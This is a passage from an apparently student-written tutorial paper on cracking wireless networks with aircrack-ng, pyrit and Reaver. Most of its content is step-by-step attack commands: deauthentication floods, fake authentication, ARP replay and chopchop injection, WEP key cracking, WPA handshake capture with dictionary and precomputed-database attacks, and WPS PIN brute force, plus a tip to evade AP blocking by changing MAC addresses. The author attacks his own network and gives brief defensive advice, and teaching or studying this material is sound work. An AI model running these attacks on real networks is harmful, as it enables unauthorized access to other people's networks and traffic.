trying to crack 00:80:5A:28:B5:AB is, the channel is 11, and we will call the output file
wepkey.
Let’s put our card in monitor mode, but first you need to know the Interface to use:
#airmon-ng
Figure 1. Using Airmon-ng
You have now a list of interfaces that you have on your machine. If you have only one
wireless card you will have only one interface, if you have two wireless cards connected
you have two interfaces. I might use different cards through all the tutorials, when you
see wlan1 and your Interface is wlan0 you use wlan0 instead of wlan1.
Remember I’m making the attacks on my machine and it could be different from yours.
So I will use wlan1 for this tutorial. To put that Interface on monitor mode use:
#airmon-ng start wlan0
By now you have the wlan1 Interface and the system created a new interface called
mon0. Well this is a virtual interface, basically “mon” comes from monitor it means
that the interface mon0 is monitoring traffic.
When you are using the commands you could use mon0 instead of wlan1, it doesn’t
make difference. Let’s go back to the tutorial…
Nuno Freitas
31
Now let’s sniff traffic from the network that we will attack, so use:
#airodump-ng wlan0
Figure 2. Using Airodump-ng to check for the network to attack
As I told you before this network I’m attacking is mine. My network is called WLAN so
by using airodump-ng I already know the BSSID, the Channel. Let’s get started:
#airodump-ng --channel 11 --bssid 00:80:5A:28:B5:AB --write wepkey wlan0
Figure 3. Using Airodump-ng on the target network
As we can see the “#Data” means the number of unique IVs we caught so far and saved
in wepkey.cap. It is possible that airodump-ng create some .pcap files like wepkey-
01.cap, wepkey-02.cap, that’s why in the end we will use in aircrack-ng “wepkey*.cap”.
Nuno Freitas
32
The “#/s” is the number of Unique IVs that we get per second. As you can see there is
no traffic at all in this network and doing the math if we will try to get 50 000 IVs, we
would need to wait 25 000 seconds, almost 7 hours to get enough IVs, so why don’t we
start a packet injection technique to speed up the unique IVs collection?
We can do that using aireplay-ng:
#aireplay-ng --arpreplay -b 00:80:5A:28:B5:AB -h 00:15:AF:A2:8D:98 wlan0
-b 00:80:5A:28:B5:AB is the access point MAC address
-h 00:15:AF:A2:8D:98 is the MAC address of the client that we will use as the “arp
requester”
This command will wait for an ARP Request coming from the network and flood the
airwaves with that ARP request but making it look like it is coming from the associated
client. An ARP request is when for example the router asks something like “Who got
this ip?” and a computer answers “I got that IP, here is my MAC Address:
A1:B2:C3:D4:E5:F5”.
So if you are attacking a network that has only one client connected it could take a
while until you get an Arp request. If there is traffic coming from the network you
might have a chance to get it the simple way. Imagine the situation, there is a client
connected but he is not doing anything like if it was on “stand-by” mode, you can make
it the hard way by deauthenticating the client using the network forcing him to
communicating with the router. Use the following command:
#aireplay-ng -0 10 -a 00:80:5A:28:B5:AB -h 00:15:AF:A2:8D:98 wlan0
-0 means deauthentication attack
10 is the number of deauthentication packets it will send
-a 00:80:5A:28:B5:AB is the access point MAC address
-h 00:15:AF:A2:8D:98 is the MAC address of the client to be deauthenticated
When the client gets back to the network you will get some ARP requests. Well this is a
simple process. You a Arp Request and you Replay it. That’s what “aireplay-ng -3” or
“aireplay-ng --arpreplay” is doing. It waits for an ARP Request and replay, it gets
another one and Replay it again. And keeps doing it and consequently generating traffic
on the network. Remember that the traffic we are collecting are nothing but packets
collecting IVs that we will use to brute force the wep key.
Nuno Freitas
33
Figure 4. Capturing Packets Airodump-ng
After you get the first Arp request you should be getting something like the image
above. It’s just a matter of time until you get enough IVs to make a brute force attack.
Once you get around 50 000 you have a good chance of crack the network.
However if you fail, just repeat the process. Get more IVs and try again. You’ll need
more IVs depending on how big is the key. There are 64-bit keys, 128-bit keys and 152-
bit keys, more bits means more password combinations possible and we might need
more IVs to crack the password. So if you fail with 50 000 get more IVs and you will
get the key.
As you know the captured data packets containing IVs are stored in the file that I called
wepkey outputted by airodump-ng. The program will write multiple files to the active
directory in different formats, but the one we are interested is the .cap files.
To perform the crack use wepkey*.cap since it could write more than one .cap file, for
example wepkey-01.cap, wepkey-02.cap…
The attack starts with this command:
#aircrack-ng -b 00:80:5A:28:B5:AB wepkey*.cap wlan0
Nuno Freitas
34
Figure 5. Using Brute force to crack WEP
So as you can see it found the WEP key of the network. The key I used for this example
was “abcdef1234” and as you see in aircrack-ng output “KEY FOUND!
[AB:CD:EF:12:34]”
This was the example of how to break a WEP network with an already authenticated
client. When you don’t have any clients connected to the network you want to break,
you should do a different type of attack, let’s find out how we can do it.
The best way to avoid someone to get access to your network it’s definitely not using WEP Encryption. Use WPA.
Nuno Freitas
35
Cracking WEP without connected clients (OPEN System)
Let’s see now how to do it if no one is connected to the Network.
This type of attack is only successful when we get some packets from the wired side of
the network. I mean it’s true that there are no clients connected over wireless, however
the AP has RJ45 ports and we need to get some traffic from there. Why?
Well, if there is no traffic there is no way possible to create traffic. You can try but the
AP will deduce that anyone is broadcasting traffic, but the client it’s not connected to
the network and the AP will throw away those packets and send a deauthentication
packet to that fake client.
However if we get some packets from the wired side and using either a chopchop attack
or a fragmentation attack we can get a fragment, which is a .xor file that contains useful
information that we could use to create an a packet to broadcast to the AP and it will
provoke the AP to answer with new packets (IVs).
That fake packet is received successfully by the AP because it sees that the information
contained on that packet is valid.
After we create that legit packet and injecting it in the air you will be able to resume the
attack as we did before using a client connected. When we got enough IVs, it’s time to
crack the password.
So, let’s get started. First, put the wireless card in monitor mode. You know the drill:
#airmon-ng start wlan0
Then use:
#airodump-ng --bssid 00:80:5A:28:B5:AB -c 11 wlan0
By now you don’t really need to use the “-w” parameter because you might get few
packets. It’s up to you.
Let’s now associate with an access point, using a fake authentication:
#aireplay-ng -1 0 -e WLAN -a 00:80:5A:28:B5:AB -h 74:EA:3A:90:C7:21 wlan0
-1 means fake authentication attack
0 means the fake authentication attack won’t stop until its succeeded
-e WLAN is the wireless SSID
Nuno Freitas
36
-a 00:80:5A:28:B5:AB is the access point MAC address
-h 74:EA:3A:90:C7:21 is our card MAC address
Figure 6. Perform a Fake Authentication
So I succeeded to perform a fake authentication into the AP.
Now I need to obtain the PRGA (Pseudo Random Generation Algorithm) file.
To obtain it we will need to perform a chopchop attack or a fragmentation attack.
This PRGA is not the WEP key and cannot be used to decrypt packets. However, it can
be used to create new packets for injection. The creation of new packets will be covered
later in the tutorial.
Either chopchop or fragmentation attacks can be used to obtain the PRGA bit file. The
result is the same, so use one of them, it doesn’t really matter which one you used.
I will cover the chopchop technique. Start another console session and run:
#aireplay-ng -4 -b 00:80:5A:28:B5:AB -h 74:EA:3A:90:C7:21 wlan0
-4 means the chopchop attack
-b 00:80:5A:28:B5:AB is the access point MAC address
-h 74:EA:3A:90:C7:21 is the MAC address of our card and must match the MAC used
in the fake authentication
wlan0 is the wireless interface name
Nuno Freitas
37
Figure 7. Performing chopchop attack
So after you perform a fake authentication you need to wait until you get a packet to
perform an attack, I kept a console window performing fake authentications at every
second as you can see, so I don’t get deauthenticated by any reason and another one
with the chopchop attack waiting for a packet to start.
When the console asks you “Use this packet?” press “y” and then ENTER to start the
chopchop attack.
Figure 8. Result of chopchop attack
Nuno Freitas
38
Wait a few seconds for the chopchop attack to make its magic. The file “replay_dec-
0917-223734.xor” as you can see above can now be used in the next step to generate an
Arp packet.
The objective is to have the access point rebroadcast the injected Arp packet. When it
rebroadcasts it, a new IV is obtained. All these new IVs will ultimately be used to crack
the WEP key.
Use the following command:
#packetforge-ng -0 -a 00:80:5A:28:B5:AB -h 74:EA:3A:90:C7:21 -k 255.255.255.255
-l 255.255.255.255 -y replay_dec-0917-223734.xor -w arp-request
-0 means generate an arp packet
-a 00:80:5A:28:B5:AB is the access point MAC address
-h 74:EA:3A:90:C7:21 is MAC address of our card
-k 255.255.255.255 is the destination IP (most APs respond to 255.255.255.255)
-l 255.255.255.255 is the source IP (most APs respond to 255.255.255.255)
-y replay_dec-0917-223734.xor is file to read the PRGA from
-w arp-request is name of file to write the arp packet to
The system will respond: “Wrote packet to: arp-request”
Let’s close the console running airodump-ng and open a new one and start airodump-ng
again. This time you need to add the “-w” parameter so we can save the IVs we will
generate to a file. If you used it already in the first one then you don’t need to close it.
So use airodump-ng like this:
#airodump-ng --bssid 00:80:5A:28:B5:AB -c 11 -w wepkey wlan0
Let’s call that file, wepkey.
On the console window you used to create the packet use this command:
#aireplay-ng -2 -b 00:80:5A:28:B5:AB -h 74:EA:3A:90:C7:21 -r arp-request wlan0
After you start injecting arp requests from the packet you just created, the cracking
process will be just like cracking WEP with a previous associated client.
This will inject the packet we created in the air. After that the system will ask you if you
want to use that packet, press “y” and ENTER to start injecting arp requests.
Nuno Freitas
39
Figure 6. Injecting artificial packets
As you can see now we are getting a lot of data (IVs).
Remember once again, when you get around 50 000 IVs you have a good chance of
crack the network.
Don’t worry if you fail, try again with more IVs. Remember that you’ll need more IVs
depending on how big is the key. There is no way to determine the size of the key so try
with 50 000 if you fail try with 200 000 and if you fail get more, and you’ll get there.
The point here is that you are doing it the right way if you fail is for bad luck and not
because you’re doing it wrong.
All of the captured data packets containing IVs are stored in the file that I called wepkey
outputted by airodump-ng. The program will write multiple files to the active directory
in different formats, but we are looking for .cap files.
Airodump-ng creates more than one .cap file, I mean it creates wepkey-01.cap, wepkey-
02.cap…
So, when you’re ready, use the command:
#aircrack-ng -b 00:80:5A:28:B5:AB wepkey*.cap
Nuno Freitas
40
Figure 7. Using aircrack-ng to get the WEP key
So as you can see it found the WEP key of the network. The key I used for this example
was “1234567890” and as you see in aircrack-ng output “KEY FOUND!
[12:34:56:78:90]”
As I told you before do not use WEP, although it is better than nothing it is an unsecure method to protect your network.
Nuno Freitas
41
Cracking WEP (Shared Key)
So, now let’s crack a WEP network using Shared Key system.
For this example we will always need a connected client. If the network doesn’t have a
connected client just wait until someone connects to the network. We need someone
from inside the network to show up because we will need a 140 bit keystream that will
allow us to fake an authentication. Without that we cannot authenticate. Remember that
Open System authentication and Shared Key works different.
So after we authenticate we need to perform a fragmentation or a chopchop attack to get
a fragment to create a packet to inject in the airwaves. After that is like cracking WEP
with Open System. Wait and get enough IVs to crack the password.
First of all, as always, put your wireless card in monitor mode.
#airmon-ng start wlan0
Then let’s search for our network, WLAN will be the target Network.
#airodump-ng -c 11 --bssid 00:80:5A:28:B5:AB -w wepska wlan0
Figure 8. Using airodump-ng to scan for networks
Using this we will sniff all the packets from WLAN network and save them in files
called wepska. We will need to perform a deauthentication on an authenticated client in
order to capture the shared key 140 bit keystream.
Nuno Freitas
42
Figure 9. Performing a deauth to a client
After you perform a deauthentication look to the top line in airodump-ng window there
is now a text saying “140 bytes keystream: 00:80:5A:28:B5:AB”
This means we have captured the .xor file we were looking for to perform a fake
authentication.
Use the following command:
#aireplay-ng -1 0 -a 00:80:5A:28:B5:AB -c 00:15:AF:A2:8D:98
-y wepska-01-00:80:5A:28:B5:AB.xor wlan0
Remember to always change the packets name from what I have to what you get. They
might be different.
Figure 10. Performing a Fake authentication
Nuno Freitas
43
Now we will perform a fragmentation attack. Use the next command:
#aireplay-ng -5 -a 00:80:5A:28:B5:AB wlan0
Figure 11. Performing a fragmentation in order to get a fragment of a packet to create an arp-request
Wait until you get a packet to use in the attack. When the system asks you “Use this
packet?” press “y” and then ENTER to use it, and you will get a fragment that we will
use to create an Arp Request.
Basically this is the same that we did before on WEP Open System without connected
clients.
Figure 12. Getting the fragment
Nuno Freitas
44
As you can see in the output of the fragmentation attack you got now a file called
fragment-0921-140138.xor or something similar.
Let’s now create an arp-request. Use the following command:
#packetforge-ng -0 -a 00:80:5A:28:B5:AB -h 74:EA:3A:90:C7:21 -k 255.255.255.255
-l 255.255.255.255 –y fragment-0921-140138.xor -w arp-request
This command will create an arp-request based in that fragment. Now we need to inject
that packet in the airwaves and it will provoke the AP to respond to them with new IVs.
#aireplay-ng -2 -b 00:80:5A:28:B5:AB -h 74:EA:3A:90:C7:21 -r arp-request wlan0
You should have the “airodump-ng” window sniffing them and saving the files, as I
used above those packets are being saved in the file “wepska*.cap”. When we got
enough IVs we will crack the WEP key. When we get around 50000 IVs use the
following command:
Figure 13. Sending the arp-request
Ok, when you got enough IVs let’s perform the bruteforce attack:
#aircrack-ng -b 00:80:5A:28:B5:AB wepska*.cap
Nuno Freitas
45
Figure 14. Using aircrack-ng
As you can see the key was successfully cracked. The key for this example as
1234567890 and as you can see in the image “KEY FOUND: [12:34:56:78:90]. So this
is everything about WEP. Let’s see now the WPA part of this tutorial.
Even being trickier to hack, WEP using Shared Key encryption is still an unsecure Encryption to use on your network. WPA is the solution
Nuno Freitas
46
Cracking WPA with Dictionary Attack (Aircrack-ng)
After WEP was proven to be completely breakable, WPA emerged as its successor, it
uses a much more advanced algorithm and does not have IVs. It doesn’t matter if you
collect a big amount of packets, you can’t crack it that way.
Most consumers use what is called WPA Personal, which utilizes a pre-shared key
(PSK), which is a common key shared across all devices used for authentication.
When a client wants to associate with a WPA encrypted network, a four-way handshake
takes place. Briefly what occurs is the client first seeks association with the AP, the AP
sends the client a bit of data which the client encrypts using the passphrase, SSID and
some other data. The client sends this back to the AP which then encrypts that. If it
match up the AP installs the main key on the client which is successfully associated and
able to decrypt the packets.
The packets are encrypted with this key, not the passcode. This is known as the four-
way handshake between a client and the AP.
Unlike WEP, there is not enough information contained in the packets to find the key.
No matter how long an attacker sniffs the network and intercepts packets, he will never
be able to crack the passphrase. However, within the four-way handshake, there is
enough information to brute-force the passphrase.
The basic steps for cracking a WPA Personal encrypted network are:
1) Discover the network and be within range to intercept packets.
2) Start sniffing the network for the four way handshake and capture it when it arises.
3) Wait for a new client to authenticate or deauthenticate a current client.
4) Brute force the captured handshake file with a dictionary file.
So the first thing to do is to put your Wireless card on monitor mode:
#airmon-ng start wlan0
So next you will search for networks within range to intercept and inject packets.
#airodump-ng wlan0
Nuno Freitas
47
Figure 15. Using airodump-ng
So let’s break into WLAN.
WLAN’s BSSID it is 00:80:5A:28:B5:AB, it’s all that we need to start sniffing packets
waiting for the four-way handshake. To begin sniffing use the following command:
#airodump-ng --bssid 00:80:5A:28:B5:AB –w wpakey wlan0
So we are now sniffing packets from WLAN network and saving them (-w) into a file
named wpakey. Just like for WEP networks we will need that file later and once again we
are interested in the *.cap file.
So, right know you either wait for a new client to connect to the network if no one is
connected already or you can deauthenticate that client forcing him to authenticate again
and by doing this you sniff the four-way handshake between the client and the Wireless AP.
Let’s make it with an authenticated client already with the following MAC Address:
00:15:AF:A2:8D:98.
Figure 16. Looking for a client to deauth
Nuno Freitas
48
So let’s deauthenticate the client with the next command:
#aireplay-ng --deauth 25 –a 00:80:5A:28:B5:AB –c 00:15:AF:A2:8D:98 wlan1
When the client connects again, you will get the four-way handshake, you can see in
airodump-ng window that you got it in the top right side of the console window.
Figure 17. Sending Deauth packets
The number after --deauth is the number of deauthentication packets aireplay-ng will send.
A higher number will increase the probability of it working, but is less stealthy.
The deauthentication was done and now we have got the four-way handshake.
Once the handshake has been captured, the attacker can stop capturing all packets. The
information contained in the handshake is all that is needed to crack to WPA
passphrase.
Once the attacker has the handshake it is possible to crack the passphrase through brute
force or dictionary techniques. This technique uses a word list and goes through each
word one at a time, encrypting it with the other data gathered (the SSID and others) to
see if it matches. When a match occurs, the word from the list is the passphrase used.
This can be extremely “time consuming” depending on the complexity of the
passphrase, the size of the dictionary file and the speed of your CPU. An attacker is
limited by his processor speed to how many passwords he can try per second.
With dictionary files containing millions and millions of different combinations of
letters and words, the process could take a very long time.
Nuno Freitas
49
Fortunately, most consumers choose simple, easy to remember passphrases that can be
decrypted using smaller dictionary files containing common names and passwords.
The program aircrack-ng can be used to crack the handshake. The attacker must have a
word list on his system. Backtrack includes several wordlists of different sizes, and
larger ones can be downloaded from the internet.
To use a word list with aircrack-ng and our captured handshake use this command:
#aircrack-ng -w /pentest/passwords/wordlists/wpa.txt wpakey*.cap
The output will look like this when aircrack-ng gets the password:
Figure 18. Key found w/ Dictionary attack
It took a little bit more than 20 minutes to discover the Wireless AP passphrase. The
attacker has now the ability to get inside the network. It took 954864 guesses to
discover the password. The dictionary file that I used it could be considered as a big
dictionary, you might not be able to avoid a successful attack by a determined attacker,
but you sure can make his work a lot harder if you use a strong password.
Nuno Freitas
50
Cracking WPA using Pyrit’s Database Attack
The next type of attack that I’ll cover is a type of attack where you could import many
dictionaries to data base and then perform an attack with all the passwords on that
database. So first let’s install a suite called pyrit because it is not included in Backtrack.
Installing pyrit
Do the following at the terminal:
svn checkout http://pyrit.googlecode.com/svn/trunk/ pyrit_svn
Then do this:
sudo apt-get install libssl-dev
sudo apt-get install scapy
sudo apt-get install python-dev
Browse to pyrit directory:
cd /pyrit_svn/pyrit
And type:
sudo python setup.py build
sudo python setup.py install
Ok, now you have Pyrit installed and it should be up and running.
I will be use Pyrit with aircrack-ng.
So first of all, put the wireless card in monitor. Let’s use aircrack-ng suite until we got
the handshake.
First use:
#airmon-ng start wlan0
Then use:
#airodump-ng wlan0
Nuno Freitas
51
Figure 19. Using airodump-ng
So at this point you should get all the information about the network you will try to
attack. For this example we will attack a WPA encrypted network with WLAN as the
ESSID, 00:80:5A:28:B5:AB as the BSSID and performing in channel 11.
Now we should begin sniffing only this network by using the following command:
#airodump-ng –bssid 00:80:5A:28:B5:AB –c 11 -2 wpahandshake wlan0
This will sniff the packets from WLAN and save them in a file called wpahandshake.
Once again I remember that we will be looking for the *.cap file in the end.
If a client is connected to the network make a deauthentication attack so the client needs
to re-authenticate and you get the handshake or if no one is connected, wait for someone
to do it.
#aireplay-ng -0 10 -a 00:80:5A:28:B5:AB -c 00:15:AF:A2:8D:98 wlan1
Now that you have the handshake, let’s use pyrit.
Let’s analyze our handshake file, use the following command in the command line:
#pyrit wpahandshake*.cap analyze
Note that wpahandshake*.cap is the name of the files that airodump-ng save with
packets sniffed from the “victims” network, they could be wpahandshake-01.cap,
wpahandshake-02.cap…
You should get a window like this:
Nuno Freitas
52
Figure 20. Analyzing handshake with Pyrit
The output is that the Access Point have the mac 00:80:5A:28:B5:AB with WLAN as
the ESSID.
It also says that the file captured an handshake from the client with mac address
00:15:AF:A2:8D:98.
So now let’s start working with Pyrit’s database.
As you may know guessing the password used in WPA-PSK and WPA2-PSK is a
computational intensive task. During this process, 100% of your CPU is being used to
compute what is known as the Pairwise Master Key, a 256bit key derived from the
ESSID and a Password using the PBKDF2-HMAC-SHA1 algorithm. One of the major
weaknesses of the WPA-PSK is that the Pairwise Master Key has no elements that are
unique to the moment of the key-negotiation between Access Point and Sation. It is
therefore possible to pre-compute the Pairwise Master Key and store it for later use.
This is where Pyrit’s database kicks in. It can store ESSIDs, passwords and their
corresponding Pairwise Master Keys, possibly growing to the size of hundreds of
millions of entries. Starting with a fresh installation of Pyrit, your database will most
probably be empty.
Issue the following command to get an overview:
#pyrit eval
And you will get this output:
Nuno Freitas
53
root@bt:~# pyrit eval
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Connecting to storage at 'file://'... connected.
Passwords available: 0
Let’s use a command to import some passwords to our database:
#pyrit –i /pentest/passwords/wordlists/wordlist.txt import_passwords
Note that “/pentest/passwords/wordlists/wordlist.txt” is the path where I have stored a
wordlist, you can use dozens of dictionary files, pyrit ensures that duplicate passwords
are not stored again in the database, it also doesn’t store passwords that are not suitable
as a WPA/WPA2 password.
After you imported the passwords to the database, use this command again:
#pyrit eval
You should get an output like this:
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Connecting to storage at 'file://'... connected.
Passwords available: 989532
Now that we have some passwords in the database, we have to create an ESSID, for
that, use the following command:
#pyrit –e WLAN create_essid
Note that WLAN is our “victims” ESSID
Pyrit output will say that ESSID WLAN was created successfully and if you use the
“eval” command again it will show you that WLAN’s ESSID don’t have any password
pre-computed.
So we have already some passwords in the database, and we have an ESSID created, we
need to pre-compute the passwords to use with that ESSID. This process could take
some minutes. It depends on how many passwords you have imported to the database.
To pre-compute the passwords with the ESSID you just created use this command:
#pyrit batch
Pyrit will give the output “Batchprocessing done” when it completes the process.
Nuno Freitas
54
We can now use the Pairwise Master Keys stored in the database to attack the same
handshake as in the example above. Instead of running a “passthrough-attack”, where
the database is not touched at all, we issue a “database-attack” like the following:
#pyrit –r wpahandshake*.cap attack_db
Don’t forget that wpahandshake*.cap is the file where the handshake is stored and that
“-r” parameter tells pyrit to read the file wpahandshake*.cap. So you should have the
following output.
Figure 21. Cracking WPA with Pyrit database attack
This process is much faster than a dictionary attack, as you can see the image above
Pyrit was trying 515375 passwords per second and gave us in the output that the
password is “security”. This process only takes more time pre-computing the passwords
with the ESSID, but will be useful when you have to use many dictionaries at the same
time.
Alright, I’ve been telling you to use WPA and still it got hacked. However it would take ages to hack a good PSK with a HUGE dictionary. So always use a strong password.
Nuno Freitas
55
Cracking a Network with Hidden ESSID (aircrack-ng + pyrit)
Cracking a network with a hidden ESSID is pretty simple, you have done already all the
steps in order to do it. It is possible to do it only with aircrack-ng, the reason I’ve made
it with aircrack-ng and pyrit is because I’ve already have the ESSID WLAN, which is
the ESSID I’ve been using in these tutorials, programmed in pyrit’s database, which
makes the process faster than using aircrack-ng’s dictionary attack. So, do not think that
it is only possible with pyrit. So, let’s get going… I’ll show it on a WPA network, if you
will try on a WEP network it’s the same, but you need to perform the deauthentication
and then go back to WEP’s method.
The first step in all of our tutorials:
#airmon-ng start wlan0
After this lets search for networks:
#airodump-ng wlan0
Figure 22. Searching for the network that has an hidden essid
As you can see there is a network with a strange ESSID, it is something like <length: 1>
This is a hidden ESSID, and we’ll be able to what is the real ESSID by performing a
deauthentication to one of the connected clients.
Let’s sniff only the hidden network’s packets:
#airodump-ng --bssid 00:80:5A:28:B5:AB -c 11 -w hiddenwpa wlan0
Let’s deauthenticate a client now:
#aireplay-ng -0 10 –a 00:80:5A:28:B5:AB –c 00:15:AF:A2:8D:98 wlan0
Nuno Freitas
56
So, now that you deauthenticated a client you should have something like this:
Figure 23. Performing a deauthentication to a client to uncover the ESSID and to obtain an handshake
As you can see the network ESSID now changed to WLAN, by doing this we also got a
handshake so let’s now crack the password:
#pyrit -e WLAN -r hiddenwpa-01.cap attack_db
Figure 24. Getting network's password with pyrit
This time we needed to add the “-e” parameter since it’s an hidden ESSID, pyrit can’t
guess it. And we have the password, it is security.
Hiding the ESSID is not enough.
Nuno Freitas
57
Attacking WPA Networks using Wi-Fi Protected Setup
Wi-Fi Protected is an optional certification program developed by the Wi-Fi Alliance
designed to ease set up of security-enabled Wi-Fi networks in home and small office
environment.
Wi-Fi Protected Setup supports methods (pushing a button or entering a PIN into a
wizard-type application) that are familiar to most consumers to configure a network and
enable security.
Reaver is an application that exploits WPS that I will use to cover this attack.
It implements a brute force attack against WPS entering PINs in order to recover
WPA/WPA2 passphrases.
The Pin is 8 digits long:
Doing the Math it would be 108
= (100 000 000) Pin combinations.
However an attacker can derive information about the correctness of parts the PIN from
the AP´s responses.
1. If the attacker receives an EAP-NACK message after sending M4, he knows that
the 1st half of the PIN was incorrect.
2. If the attacker receives an EAP-NACK message after sending M6, he knows that
the 2nd half of the PIN was incorrect.
This form of authentication dramatically decreases the maximum possible
authentication attempts needed from 108 = 100 000 000 to 10
4 + 10
4 = 20 000.
As the 8th digit of the PIN is always a checksum of digit one to digit seven, there are at
most 104 + 10
3 = 11 000 attempts needed to find the correct PIN.
Reaver has been designed to be a robust and practical attack against WPS, and has been
tested against a wide variety of access points and WPS implementations.
On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-
10 hours, depending on the AP. In practice, it will generally take half this time to guess
the correct WPS pin and recover the passphrase.
Nuno Freitas
58
Below there is a flowchart that explains the method used by the Bruteforce attack to the
WPS flaw:
On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-
10 hours, depending on the AP. In practice, it will generally take half this time to guess
the correct WPS pin and recover the passphrase.
I want to make it clear this will only work on networks with WPS enabled. Since the
Router I’ve been using doesn’t have WPS I will use a new one with the same
configurations (ESSID and Passphrase).
Nuno Freitas
59
But you don’t need to worry, I’ll cover how to check if an AP has WPS enabled or not.
First of all download Reaver. It doesn’t come with Backtrack so you have to install it,
even though it is easy to do it.
You can download Reaver at http://code.google.com/p/reaver-wps/downloads/list
After you download extract Reaver folder to your desktop or whatever other folder you
want.
By the way Reaver is only supported on the Linux platform, requires the libpcap and
libsqlite3 libraries.
After you extracted the folder, browse to it. Let’s do it like if I extracted to my Desktop
folder.
In the shell, browse to the following directory:
#cd /root/Desktop/reaver-1.3/src/
Within this directory you will find several files.
Let’s start the installation, run the following command:
# ./configure
If you get this error: “bash: ./configure: Permission denied”
Use the command:
#chmod +x configure
This will give execution permission to the file “configure”
Try again, this time you won’t have any problems.
# ./configure
Let it install, when it finishes use the following command:
# make
And then:
# make install
Ok, Reaver is installed.
Now we can have some fun with Reaver. Let’s start the attack.
The first thing to do is to put your Wireless card on monitor mode:
Nuno Freitas
60
#airmon-ng start wlan1
Then let’s sniff some beacon frames and save them in an output file:
#airodump-ng -w beacons mon0
Let airodump-ng run for a while, 1 minute is enough. Don’t forget to use -w option to
save the packets you’re getting in a file. What we want are Beacon frames, don’t worry
about data packets.
Then you will run the following command:
# walsh -C -f beacons-*.cap
Walsh will look at the cap files that airodump-ng created with the beacon frames and
will give you a list of the networks that have WPS enabled.
Then run:
#airodump-ng mon0
Check what channel is your target running
Now launch reaver:
Nuno Freitas
61
#reaver -i mon0 -b 00:24:17:DB:BF:F6 -c 1 –vv
-vv enables verbose mode, and you can see the progress and the warnings.
-b is the bssid of the target network
-c the channel that the network is broadcasting on
Nuno Freitas
62
You can use aircrack’s fake authentication while running reaver, it’s up to you.
If you start getting blocked by the AP use macchanger command to change your mac
and start again.
After some hours running Reaver, you will get to the passphrase.
As you can see, we got the passphrase which in this case was “security”.
In this particular situation WPA is cracked even if you have a good password. Although by disabling WPS on your Router you will annul this flaw.
Nuno Freitas
63
Conclusions
When I started this Independent Study I had a rough idea of what I wanted to
research/learn about and it was a very rewarding experience. I’ve learned more than I
was expecting and I really enjoyed the time I took learning and practicing.
I read books, websites watched videos from which I guided myself but still, I thought
about writing my own paper as a second method of study.
I took the leap after I found a paper like this one and I really wanted as retribution to
write a paper of mine, so other that are in the same situation that I was some months ago
could learn with a simple and pleasant reading since I wrote this paper as I was learning
from zero.
![Nuno V.M. Portfolio[1]](https://static.fdocuments.us/doc/165x107/546e32fbaf79595e068b68e3/nuno-vm-portfolio1.jpg)
